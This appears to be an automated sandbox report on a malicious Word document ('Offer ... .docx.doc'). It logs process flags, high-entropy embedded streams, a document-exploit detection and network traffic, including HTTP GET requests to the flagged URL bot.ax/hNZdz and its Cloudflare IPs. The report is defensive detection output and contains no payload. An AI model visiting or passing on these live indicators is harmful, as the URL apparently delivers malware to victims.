Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91669502048 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980428/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980429/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980430/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980431/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980433/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980434/CONTENTS' entropy: 7.91669502048 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980435/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980436/CONTENTS' entropy: 7.91598386737 (max. 8.0)

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

Directory queried: number of queries: 1006

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.171.37	unknown	United States		13335	CLOUDFLARENETUS	false
104.21.47.128	bot.ax	United States		13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.255

Contacted Domains

Name	IP	Active
bot.ax	104.21.47.128	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bot.ax/hNZdz	false	Avira URL Cloud: safe	unknown
http://bot.ax/hNZdz	false	Avira URL Cloud: safe	unknown

AV Detection

Multi AV Scanner detection for submitted file

Source: Offer 15492024 15602024.docx.doc

ReversingLabs: Detection: 13%

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 172.67.171.37:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.47.128:443 -> 192.168.2.22:49169 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 104.21.47.128:443 -> 192.168.2.22:49170 version: TLS 1.2

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

Directory queried: number of queries: 1006

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: bot.ax
Source: global traffic	DNS query: name: bot.ax
Source: global traffic	DNS query: name: bot.ax
Source: global traffic	DNS query: name: bot.ax
Source: global traffic	DNS query: name: bot.ax

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.171.37:80
Source: global traffic	TCP traffic: 172.67.171.37:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.171.37:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.171.37:80
Source: global traffic	TCP traffic: 172.67.171.37:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 172.67.171.37:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.67.171.37:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.171.37:80
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.171.37:443
Source: global traffic	TCP traffic: 172.67.171.37:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 104.21.47.128:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.47.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.171.37:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 104.21.47.128:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 104.21.47.128:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.47.128:80

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.67.171.37 172.67.171.37
Source: Joe Sandbox View	IP Address: 104.21.47.128 104.21.47.128

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /hNZdz HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: bot.axConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /hNZdz HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: bot.axConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

